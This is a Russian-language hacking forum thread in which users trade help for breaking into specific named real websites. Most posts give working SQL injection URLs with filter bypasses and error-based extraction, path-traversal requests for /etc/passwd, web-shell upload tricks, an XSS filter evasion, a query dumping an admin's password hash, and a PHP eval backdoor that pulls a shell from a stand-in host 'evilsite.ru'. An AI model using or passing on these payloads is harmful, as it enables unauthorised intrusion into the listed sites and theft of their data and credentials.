?? А если
group by
?
Абсолютно неверный подход имхо.


Угу, а какой тогда перспективнее?

Vip77 said:
Как раскрутить http://www.its-my-life.ru/question.html?r=1


Именно в этом скрипте не нашел уязвимость, зато нашел тут:


http://www.its-my-life.ru/article/40/1202%27+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1 +UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT %28MID%28%28select+concat_ws%280x3a,version()%29%2 9,1,63%29+,+%20FLOOR%28RAND%280%29*2%29%29%29+--++--+%27.html

Как вывести несколько строчек из бд при выводе через ошибки?

Или допустим сначал 1 потом 2

Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку

blesse said:
Как вывести несколько строчек из бд при выводе через ошибки?
Или допустим сначал 1 потом 2
Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку


попробуйте limit 1,1. Должно вывести вторую, а limit 2,1 -- третью.

Нужна Ваша помощь.

Нашел уязвимость на неком сайте в fckeditor. Можно заливать файлы все кроме php. Примечательно, что можно залить файл .htaccess даже. Я пробовал залить шелл с произвольным расширением в связке к примеру :


Code:
ForceType application/x-httpd-php SetHandler application/x-httpd-php

Но, вот какая незадача, он вместо запуска скачивается.

Прошу Вашей помощи.

Ccылка на уязвимость (http://tinyurl.com/cvap4mr)

Ссылка на файлы загруженные через едитор (http://tinyurl.com/bw6vfx4)

Вобщем думаю знатокам будет интересно. Жду Ваших советов

вопрос по htaccess

могу ли я выставлять права в фаиле htaccess

лежащем в деректории /var/html/www/1234

на директорию /var/html/www/12345

и как если да?

ReVOLVeR said:
вопрос по htaccess
могу ли я выставлять права в фаиле htaccess
лежащем в деректории /var/html/www/1234
на директорию /var/html/www/12345
и как если да?


нет. Не можешь. Только на дочерние.

Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:

http://site/vulnerable.php?file=inj.php

а надо

http://site/vulnerable.php?file=../../inj.php

+ фильтрация такова:


PHP:
str_replace("/","",escape($_GET['file']))

Qwert321 said:
Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:
http://site/vulnerable.php?file=inj.php
а надо
http://site/vulnerable.php?file=../../inj.php
+ фильтрация такова:

PHP:
str_replace("/","",escape($_GET['file']))



Если сервер на Windows то может помочь обратный слэш\

Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?

Не хочу быть навязчивым, но сейчас результат моего скрипта ~20 предполагаемых скулей(15 из них подтверждаются, но "наличие" скулей в youtube и hpc напрягает ) из 230 линков. Это нормальный показатель?

Заранее благодарен.

FunOfGun said:
Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?


Может линк покажите?

WendM said:
Может линк покажите?


http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--

FunOfGun said:
http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--


Собственно все просто, просто побольше читать...


Code:
http://www.currentsolutions.com/articles.php?id=99999.9+/*!union*/(select+1,2,3,4)+--+

http://flowap.ru/download/index.php?...ile=config.php

Я так понимаю это php инж. Но файл кфг пустой, что дальше делать??

http://io.nios.ru/index.php?showpage&page=config.php

И вот тут подскажите что делать дальше

0xd098d0b3d0, RFI/LFI подразумивает под собой исполнение php кода из подгружаемого фаила.

Во втором случае подгружает только из папки io.nios.ru/pages/ т.к фильтруются спец символы

io.nios.ru/index.php?showpage&page=\%27/.@#$%^&*()

нет возможности поднятся выше на каталог.

Посмотри внимательно есть ли возможность повлиять на

содержимое какого либо из этих фаилов.

В первом не понял линк.

http://flowap.ru/download/index.php?act=open_zip&id=7853&file=config.php

Вот линк первого.

И как проверить эту возможность повлиять на содержимое?

http://flowap.ru/download/index.php?act=open_zip&id=7853&file=index.php

а в этом случае читалка фаилов.

WB Engine (MU-version)

Ищи, в интернете , качай двиг, смотри где лежат конфиги.

Подскажите возможные исполЬзования такой LFI


Code:
_ttp://mreseo.com/hosting.php?id=../123

Как видно из ошибок - скрипт дописывает окончание .php

Конфигов базы я не нашёл.

Желательно в ЛС и как можно более подробный гайд.

qwwertty said:
Подскажите возможные исполЬзования такой LFI

Code:
_ttp://mreseo.com/hosting.php?id=../123

Как видно из ошибок - скрипт дописывает окончание .php
Конфигов базы я не нашёл.
Желательно в ЛС и как можно более подробный гайд.


Залить куда-нибудь шелл, запустить его уже есть возможность.

Ну я не нашёл способов залить его, а RFI тут нет =)

qwwertty said:
Ну я не нашёл способов залить его, а RFI тут нет =)


По идее .php в конце добавляется автоматом, но если ты сделаешь такой запрос:


http://mreseo.com/hosting.php?id=../../../../../../../../../../../etc/passwd////[4096 слешей]////


то есть вероятность получить файл /etc/passwd и др.

herfleisch said:
По идее .php в конце добавляется автоматом, но если ты сделаешь такой запрос:
то есть вероятность получить файл /etc/passwd и др.


По сути дырка без возможности залить шелл бесполезна?

qwwertty said:
По сути дырка без возможности залить шелл бесполезна?


Смотря что ты имеешь ввиду под словом "бсеполезно". Просто найти LFI и залить шелл - это просто идеальнейший вариант, такой себе сферический конь в вакууме.

Попробуй подобрать что-нибудь из этого (http://www.xakep.ru/post/49508/?print=true), например.

herfleisch said:
Смотря что ты имеешь ввиду под словом "бсеполезно". Просто найти LFI и залить шелл - это просто идеальнейший вариант, такой себе сферический конь в вакууме.
Попробуй подобрать что-нибудь из
этого (http://www.xakep.ru/post/49508/?print=true)
, например.


Интересная статья, но реализовать так и не вышло

Полагаю для /proc/self недостаточно привилегий.

herfleisch said:
http://mreseo.com/hosting.php?id=../../../../../../../../../../../etc/passwd////[4096 слешей]////.


Если у Вас используется php >5.3, то там данная дыра уже закрыта

MQ=Off ??

_ttp://mreseo.com/hosting.php?id=../123.php%00

Так что вернёт ???


Полагаю для /proc/self недостаточно привилегий.


На основании чего такие предположения ?

BigBear said:
Если у Вас используется php >5.3, то там данная дыра уже закрыта
MQ=Off ??
_ttp://mreseo.com/hosting.php?id=../123%00
Так что вернёт ???
На основании чего такие предположения ?


Скорее всего юзер ограничен своей директорией.


Code:
/home/content/28/9889628/html/mreseo/



Code:
?id=../123%00
Failed opening 'pages/../123\0.php'

qwwertty said:
Скорее всего юзер ограничен своей директорией.

Code:
/home/content/28/9889628/html/mreseo/


Code:
?id=../123%00
Failed opening 'pages/../123\0.php'



Причем здесь ограничения в директории? Ответ уже был дан: версия php 5.3, ////4096/// не прокатит, как и %00 из-за настрек в php.ini, поэтому расширение .php вы не как не отбросите.

ПРУФ: ?id=../index

Ещё интересна возможность раскрутки такой скули.


Code:
_ttps://www.trimaxcloud.com/partner.php?id=7'&idsub=39'

Кавычки экранирует, вывода нет.

Всё что есть - раскрытие путей


Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\wamp2\www\partner.php on line 10

По тому же дорку:


Code:
_ttp://www.tcilmanagedservices.com/partner.php?id=7'&idsub=39'

P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.

Вот нашел скрипт, позволяющий, как мне кажется то-ли залить файл на сервер, то-ли запустить скрипт.

Но моих познаний явно не хватает для оценки его возможностей:


Code:
0)

$c = ' $(function() { $("select[name=type]").val ('.$CURUSER['cs_last_type'].') });
';

$c .='

Заголовок:



Тип:

'.$o.'

Отрывок:





';

$title = 'Добавить код';

}
else
{
$text = $_POST['text'];

$title = strip_tags ($_POST['title']);

$type = intval ($_POST['type']);


include ('include/geshi.php');

$language = strtolower ($types[$type]);

$path = 'include/geshi/';

$geshi = new GeSHi($text, $language, $path);

$geshi->enable_line_numbers (GESHI_FANCY_LINE_NUMBERS);

$geshi->set_tab_width (4);

$hltext = $geshi->parse_code();


sql_query ("INSERT INTO `codeshare` SET

`title` = ".sqlesc ($title).",

`user_id` = ".$CURUSER['id'].",

`type` = ".$type.",

`size` = ".mb_strlen ($text)."

");

$id = mysql_insert_id ();

sql_query ("INSERT INTO `codeshare_data` SET

`id` = ".$id.",

`text` = ".sqlesc (htmlspecialchars ($text, ENT_COMPAT, 'UTF-8')).",

`hltext` = ".sqlesc ($hltext)."

");//or die (mysql_error ());

sql_query ('UPDATE `users` SET `cs_last_type` = '.$type.' WHERE `id` = '.$CURUSER['id']);

header ('Location: /codeshare.php?id='.$id);

die ();
}
?>

Если он может выполнять другой код, то мне достаточно провести инъекцию и выполнить ее используя этот скрипт.

Подскажите, как это сделать, или укажите утилиту, которая может проанализировать код на уязвимость

Спасибо

qwwertty said:
Кавычки экранирует, вывода нет.
Всё что есть - раскрытие путей


Бред пишешь.

_ttps://www.trimaxcloud.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1,@@version,3,4+--+

_ttp://www.tcilmanagedservices.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1,@@version,3,4+--+


P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.


Тем же WSO сделай бэкконект и сиди со своей консольки.

Ещё как альтернативу юзаю P.A.S. шелл.

Есть SQLi


Code:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2 ,3,table_name+from+information_schema.tables+where +table_schema!=0x696e666f726d6174696f6e5f736368656 d61--+

В ответ получаю


Incorrect database name 'mysql.o'


Не могу вкурить в чем проблема

WendM said:
Есть SQLi

Code:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2 ,3,table_name+from+information_schema.tables+where +table_schema!=0x696e666f726d6174696f6e5f736368656 d61--+

В ответ получаю
Не могу вкурить в чем проблема


_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+

Вердикт неутешителен - фильтруется "точка"

Замены типа %2e и %252e не помогают.

BigBear said:
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.


_http://www.lory-press.ru/showreview.php?id=9999999999999.9+order+by+4+--+

А почему тут не фильтруется?

BigBear said:
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.


Ты не прав, скорее всего база пуста.

В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"

В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает

Пруф>>>

_tp://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,u ser%28%29,3,4+--+

qwwertty said:
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает


Проверил ещё раз.

Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+

File_Priv=N

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+

BigBear said:
Проверил ещё раз.
Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+
File_Priv=N
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+


И правда, но кое что есть

Data Found: Host:Userassword:Update_priv:Insert_priv:Select_pr iv:Create_user_priv:Grant_privelete_privrop_priv:C reate_priv:File_priv

localhost:root: :Y:Y:Y:Y:Y:Y:Y:Y:N

PS чтото получше sqlihelpera для дампа есть?

господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql

там есть помимо прочих и такие:

cacti [1]:

debian-sys-maint [1]:

f2 [1]:

frontend [1]:

replication [1]:

wizard [1]:

есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?

http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+

как обойти блок select ??

Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?

kcash said:
Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?


да. руки и мозг


kcash said:
господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql
там есть помимо прочих и такие:
cacti [1]:
debian-sys-maint [1]:
f2 [1]:
frontend [1]:
replication [1]:
wizard [1]:
есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?


какой ещо движок???? ето пароли от майскул базы

0xd098d0b3d0 said:
http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
как обойти блок select ??


http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+

тут фильтрация связки union+select , а не только select

Нашел sqli в хттп заголовках X-Forwarded-For:

Когда сделал запрос X-Forwarded-For: ' order by 2# мне ответили:

General Error This account disabled

Потом X-Forwarded-For: ' order by 3# и мне ответили:

General Error SQL ERROR [ mysql4 ] Unknown column '3' in 'order clause' [1054]

Я так понял, что там всего 2 поля...

Но когда вбиваю X-Forwarded-For: ' union select 1,2# мне пишут мол

General Error SQL ERROR [ mysql4 ] Unknown table 's' in field list [1109]

как раскрутить?

smirk said:
http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+
тут фильтрация связки union+select , а не только select




Code:
_ttp://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,%28user%28%29%29,%28version%28% 29%29,%28database%28%29%29,5,6,7,8,9,10,11,12,13,1 4%29+--+

Code:
http://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,2,3,4,5,6,7,8,9,10,11,12,13,14% 29+from+information_schema.tables+--+


А обойти 403 в таком запросе получиться??

0xd098d0b3d0 said:

Code:
http://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,2,3,4,5,6,7,8,9,10,11,12,13,14% 29+from+information_schema.tables+--+

А обойти 403 в таком запросе получиться??


Похоже тут точку фильтрует.

0xd098d0b3d0 said:

Code:
http://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,2,3,4,5,6,7,8,9,10,11,12,13,14% 29+from+information_schema.tables+--+

А обойти 403 в таком запросе получиться??



http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,concat_ws(0x03a,table_schema,tabl e_name,column_name),3,4,5,6,7,8,9,10,11,12,13,14+f rom+`information_schema`.columns)+--+

s0n1k said:
есть форма заливки файла файл успешно заливается, можно узнать путь до папки загрузки ?


Может да, а может и нет.

Только так можно ответить на подобные вопросы, где не раскрываются ни название скрипта, ни url, ни что-либо ещё...

З.Ы. Сильно помогло ?

Vip77 said:
как с помощью sqlmap раскрутить sqli через http заголовки?


Вместо


Code:
sqlmap

Используй руки.

руками не прокатывает

Привет! Почему я в FF делаю запрос к БД со скобками "user()" и браузер фильтрует их преобразовывая в "user #45005232991653576411" и запрос не получается. В то время через оперу все нормально.

Как это обойти?

ЗЫ Установил в FF хакбар, как только не кодирую серавно запрос не проходит

Кот в сапога said:
Привет! Почему я в FF делаю запрос к БД со скобками "user()" и браузер фильтрует их преобразовывая в "user #45005232991653576411" и запрос не получается. В то время через оперу все нормально.
Как это обойти?
ЗЫ Установил в FF хакбар, как только не кодирую серавно запрос не проходит


Установи старый FF и будет тебя счастье

Zed0x said:
Установи старый FF и будет тебя счастье


Спасибо! Но этот вариант мне известен. Неучто все тестируют изпод старых браузеров?

Ты каким пользуешься?

Кот в сапога said:
Спасибо! Но этот вариант мне известен. Неучто все тестируют изпод старых браузеров?
Ты каким пользуешься?


http://www.cometbird.com/

Как с помощью sqlmap раскрутить sqli через http заголовки? Если вбиваю --header=X-Forwarded-For: то не прокатывает... Помогите плиз. Мне надо исключительно с помощью sqlmap.

Кот в сапога said:
Привет! Почему я в FF делаю запрос к БД со скобками "user()" и браузер фильтрует их преобразовывая в "user #45005232991653576411" и запрос не получается. В то время через оперу все нормально.
Как это обойти?
ЗЫ Установил в FF хакбар, как только не кодирую серавно запрос не проходит


поставь браузер http://getmantra.com/ и будет щястя )

Подскажите код бэкдора на шелле?

Чтобы строчка на eval вызывала шелл с другого сайта...

ldschooler said:
Подскажите код бэкдора на шелле?
Чтобы строчка на eval вызывала шелл с другого сайта...




Code:

А можно на конкретном примере?

ldschooler said:
А можно на конкретном примере?




Code:
http://target/evil.php?cmd=
http://target/evil.php?cmd=phpinfo();
http://target/evil.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://evilsite.ru/shell.txt&o=shell.php

Либо echo '' > shell.php

Так и делаю, но не открывается шелл по последней строчке

ldschooler said:
Так и делаю, но не открывается шелл по последней строчке


Сохрани как txt - и посмотри что выходит.

echo '' > 111.txt

qwwertty said:
Сохрани как txt - и посмотри что выходит.
echo '' > 111.txt


Forbidden

You do not have permission to access this document.

ldschooler said:
Forbidden
You do not have permission to access this document.


Это происходит при попытке залить шелл с таким кодом?


Code:


Либо на этом шаге?


Code:
echo '' > 666.php

Есть шелл. На шелле я создал файл php с содержимым ""

Ошибка эта даже при попытке вывести phpinfo.

ldschooler said:
Есть шелл. На шелле я создал файл php с содержимым ""
Ошибка эта даже при попытке вывести phpinfo.


Три варианта:

1) Ищи другую папку

2) Пробуй чтото вроде chmod_R(/, 0777);

3) Либо попытайся удалить .htaccess

qwwertty said:
Три варианта:
1) Ищи другую папку
2) Пробуй чтото вроде chmod_R(/, 0777);
3) Либо попытайся удалить .htaccess


1) Пробовал уже. Ничего не меняется.

2) "777" стоят на папках и если в папку залить тупо шелл - он запустится без проблем.

3) Не помогает.

ldschooler said:
1) Пробовал уже. Ничего не меняется.
2) "777" стоят на папках и если в папку залить тупо шелл - он запустится без проблем.
3) Не помогает.


Листинг директорий конечно же не включён?(

qwwertty said:
Листинг директорий конечно же не включён?(


Понятия не имею.. это вообще что такое?

Можно твой номер icq в ПМ?

Там удобнее просто было бы

ldschooler said:
Понятия не имею.. это вообще что такое?
Можно твой номер icq в ПМ?
Там удобнее просто было бы


Инфо по suhosin ищи сам =)

У меня такой вопрос.

Является ли нарушением УК или каких нить там еще кодексов, то что я выкладываю SQL inj в соответсвующий топик, в формате http://site.com/index.php?go=1+union+select 1,2,3 +--+

0xd098d0b3d0 said:
У меня такой вопрос.
Является ли нарушением УК или каких нить там еще кодексов, то что я выкладываю SQL inj в соответсвующий топик, в формате http://site.com/index.php?go=1+union+select 1,2,3 +--+


Проверь сам. Когда выкладываешь скулю внизу красным цветов пиши по шаблон:

ФИО

Адрес где проживаешь

Номер паспорта

0xd098d0b3d0 said:
У меня такой вопрос.
Является ли нарушением УК или каких нить там еще кодексов, то что я выкладываю SQL inj в соответсвующий топик, в формате http://site.com/index.php?go=1+union+select 1,2,3 +--+


Является. У тебя преступный умысел etc.

Ну, у меня опять проблемы с фильтрацией Пробую так

http://www.mp3hun gama.com/music/genre_albums.php?id=3+(union)/**/(select+1,2,3)+--+, но чего-то я не учел... Заранее благодарен.

Zed0x said:
Проверь сам. Когда выкладываешь скулю внизу красным цветов пиши по шаблон:
ФИО
Адрес где проживаешь
Номер паспорта


Я думаю, и без этого можно обойтись, если появится интерес к тебе и так найдут...

FunOfGun said:
Ну, у меня опять проблемы с фильтрацией
Пробую так
http://www.mp3hun gama.com/music/genre_albums.php?id=3+(union)/**/(select+1,2,3)+--+
, но чего-то я не учел... Заранее благодарен.


http://www.mp3hungama.com/music/genre_albums.php?id=-3+union%0Aselect+1,2,3+--+

ток либо вывода нет, либо я не увидел, если нет, то через ошибку надо крутить..

FunOfGun said:
Ну, у меня опять проблемы с фильтрацией
Пробую так
http://www.mp3hun gama.com/music/genre_albums.php?id=3+(union)/**/(select+1,2,3)+--+
, но чего-то я не учел... Заранее благодарен.


_ttp://www.mp3hungama[antigoogle]com/music/genre_albums.php?id=3+or+1+group%0aby+mid(version( ),rand(0)|0)+having+avg(0)+--+-

Проблема вот в чем:

Сначало rawurldecode а потом:

function quote_smart($in)

{

if (is_int($in) || is_double($in)) {

return $in;

} elseif (is_bool($in)) {

return $in ? 1 : 0;

} elseif (is_null($in)) {

return 'NULL';

} else {

return "'" . str_replace("'", "''", $in) . "'";

}

}

Вечер добрый. Как построить строчку, чтобы загрузить в другой каталог? Или может использовать не wget?

Artrix said:
Вечер добрый. Как построить строчку, чтобы загрузить в другой каталог? Или может использовать не wget?




или

А можно как нибудь вывести адреса папок с 0777 через php?

Artrix said:
А можно как нибудь вывести адреса папок с 0777 через php?


find / -type d -perm 0777

Залил в дирректорию с 0777, проинклюдил, появился шел, но при нажатии пустое окно. И error log больше не идет(( LFI

Artrix said:
Залил в дирректорию с 0777, проинклюдил, появился шел, но при нажатии пустое окно. И error log больше не идет(( LFI


Попробуй залить то же самое, только как txt файл - и посмотри, мб код сломан.

Есть активка "> возможно через нее загрузить скрипт? словo script и все составляющие не проходят. Нужно чтобы работало на подобии

http://www.ctege.info/index.php?option=1 как раскрутить?

Vip77 said:
http://www.ctege.info/index.php?option=1 как раскрутить?


Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:

http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd


FILE NOT FOUND: etcpasswd/7.html
URI:/etcpasswd/7.html
Fatal error: Using $this when not in object context in /var/www/user/data/www/ctege.org/includes/database/dbcache.php on line 206

OxoTnik said:
Гугли обход фильтраций XSS


Зачем мне это гуглить, xss есть, мне просто нужно чтобы скрипт свой можно было подгрузить. В общем кто знает как это сделать стукните в личку даю 500р

herfleisch said:
Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:
http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd


sqli там тоже есть

Как раскрутить это?


Code:
_ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27

qwwertty said:
Как раскрутить это?

Code:
_ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27





Code:
select user_id, username, posts from phorum_users where posts > 0 order by posts DESC LIMIT 0,[INJECT]

Инъекция в LIMIT при использовании конструкции ORDER BY.

Вывод - никак не раскрутишь.

Как в таком запросе: http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20-- вместо version() вывести произвольную строку? Заранее благодарен.

FunOfGun said:
Как в таком запросе:
http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20--
вместо version() вывести произвольную строку? Заранее благодарен.


шифруешь строку в хекс и вставляешь

Vip77 said:
sqli там тоже есть


SQLi там есть, но раскрутить ее у меня не получилось, ибо строка запроса тупо попадает в условие запроса. Кто-то более опытный, может быть, сможет что-то выжать.

Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/

Vip77 said:
Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/




darky said:
В этой и только в этой теме вы можете задать вопрос про
способ заливки шелла, детальные разборки xss и sql на конкретных сайтах...


Первый пост темы

Ключевое слово тут - детальной.

Помогите раскрутить

http://tonnel.ru/?l=recept&recept=obich&idi=193'

И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается

zenon3 said:
Помогите раскрутить
http://tonnel.ru/?l=recept&recept=obich&idi=193'
И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается


по первому вопросу:

запрос фильтруется по union, когда передаёшь гетом(возможно ещё что-то, но пофиг). Скрипт принимает пост так же как и гет, только не фильтрует данные (или же хост сам фильтрует только гет на юнионы и пр.).

Шлёшь на http://tonnel.ru/

l=recept&recept=obich&idi=-193' union select 1,(select table_name from information_schema.tables limit 1),3,4,5,6,7,8,9--

2. смотря как фильтруется, может и саму фильтрацию просто можно обойти.

Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю:

Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

И вот че пишут: 63303161616237343161363064663039313866363861346434 303137623331

Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает.

Как вывести весь пароль?

Vip77, можно использовать функцию RIGHT().

Vip77 said:
Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю:
Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
И вот че пишут: 63303161616237343161363064663039313866363861346434 303137623331
Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает.
Как вывести весь пароль?




PHP:
1' and(select 1 from(select count(*),mid((sele ct unhex(hex(cast(password as char))) from `s lidem`.dle_users limit 0,1),rand(0)|0,64)x from information_schema.tables group by x)a) and� �'1'='1

Помогите раскрутить.

http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/*

По-моему, параметр page в коде просто приводится к целому числу и вставляется

...desc limit {$page}-12, 12....

Но я могу ошибаться.

singa said:
Помогите раскрутить.
http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/*
По-моему, параметр page в коде просто приводится к целому числу и вставляется
...desc limit {$page}-12, 12....
Но я могу ошибаться.


_ttp://www.guljan.info/news/2012/October/2707?page=-2


select a.* from articles as a where 1=1 AND ( (a.enable_publications_date = 1 AND a.from_publications_date 1356805614) OR a.enable_publications_date = 0 )and rubricator_id IN (1, 13, 7, 8, 10, 12, 16, 11, 25, 17, 24, 26, 23, 20, 22, 27, 19) and lang = 'ru' and a.flag_delete = '0'
order by
a.added desc, a.article_id desc
limit -36, 12


Вектор атаки невозможен по причине выделенной выше

Помогите раскрутить:


Code:
_ttp://w ww.knightarmco.com/shop/ index.php?keyword=5&main_page=advanced_search_result&search_in_description=1

параметр keyword уязвим... чёт у меня ничего не получается...

Ребят есть активная XSS. Имеется фильтр на слово script.

Нужно подгрузить свой js файл. Нужна альтернатива

_Spamer_ said:
Ребят есть активная XSS. Имеется фильтр на слово script.
Нужно подгрузить свой js файл. Нужна альтернатива


Можнно использовать в каком-либо теге:


Code:
onload='eva("\x01\x02\x03")'

И вставлять либо с помощью getElementById или любым удобным способом.

Помогите получить чтение файлов через этот скрипт. Ковычки экранируются.

index.php?id=15&pr=d'


Warning: fopen(includes/profiles/d\'.html) [function.fopen]: failed to open stream: No such file or directory in /www/htdocs/www.domain.com/folder/folder2/includes/src.php on line 71
Warning: filesize() [function.filesize]: stat failed for includes/profiles/d\'.html in /www/htdocs/www.domain.com/folder/folder2/includes/src.php on line 72
There are no udrtd starting with d\'.
Warning: fclose(): supplied argument is not a valid stream resource in /www/htdocs/www.domain.com/folder/folder2/includes/src.php on line 79


Код самого скрипта:


PHP:
200){

$data=fread($fp,filesize($thefile));

echo"$data";

}

else{

echo"There are no users starting with$letter.";

}

fclose($fp);

}

} else {

include_once("includes/profiles/page.html");

}

}

?>

Я нашел чтение файлов через другой скриптец, но там криво читает некоторые файлы(начинает не с начала). Код вот этого удалось получить нормально, надеюсь через него получить полноценное чтение.

Откидывай расширение и вперед.

Данные в php скрипте фильтруюца такой рег-кой,


PHP:
/(\W|\_)/

, можно ли обойти как-то(необходимо кавычку всунуть) или как-то выйти за кавчку в sql запросе.

С наступающим!

Всем привет! http://www.mobile-review.com/cgi-bin/presents2012.pl?"&option=redirect реально раскрутить sqli?

Добрый день! Помогите со скулей.

union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17

ни в какую не хочет пропускать круглые скобочки. Возвращает просто пустую страницу.

Работает с @@version, кстати вернуло 5.0.51a-24+lenny2+spu1 (Web Server: Apache/2.2.9 (Debian))

cipa21, unhex(hex(version()))

Skofield said:
cipa21
, unhex(hex(version()))


видимо я не так выразился.... в адресную строку вообще НИКАК нельзя писать скобочки, возвращает пустую страницу

не пропускает именно вместе скобки открывающуюся с закрывающейся, по отдельности работает но только толку от этого ноль

Expl0ited said:
Откидывай расширение и вперед.


Я провтыкал, там и ковычки и null-byte экранируется. Есть еще варианты?

cipa21 said:
видимо я не так выразился.... в адресную строку вообще НИКАК нельзя писать скобочки, возвращает пустую страницу
не пропускает именно вместе скобки открывающуюся с закрывающейся, по отдельности работает но только толку от этого ноль


-full url encode?

-использование "@@"

А в боевых условиях (достать хеш) зачем вам скобочки?


union+select+1,2,password,4,5,6,7,8,9,10,11,12,13, 14,15,16,17+from+users+where+id=1+--+f




union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+information_schema.tables+limit +1,1+--+f

Помогите подобрать количество полей в:


Code:
http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=-1'

GhostW said:
Помогите подобрать количество полей в:

Code:
http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=-1'



Только через Error-Based:


Code:
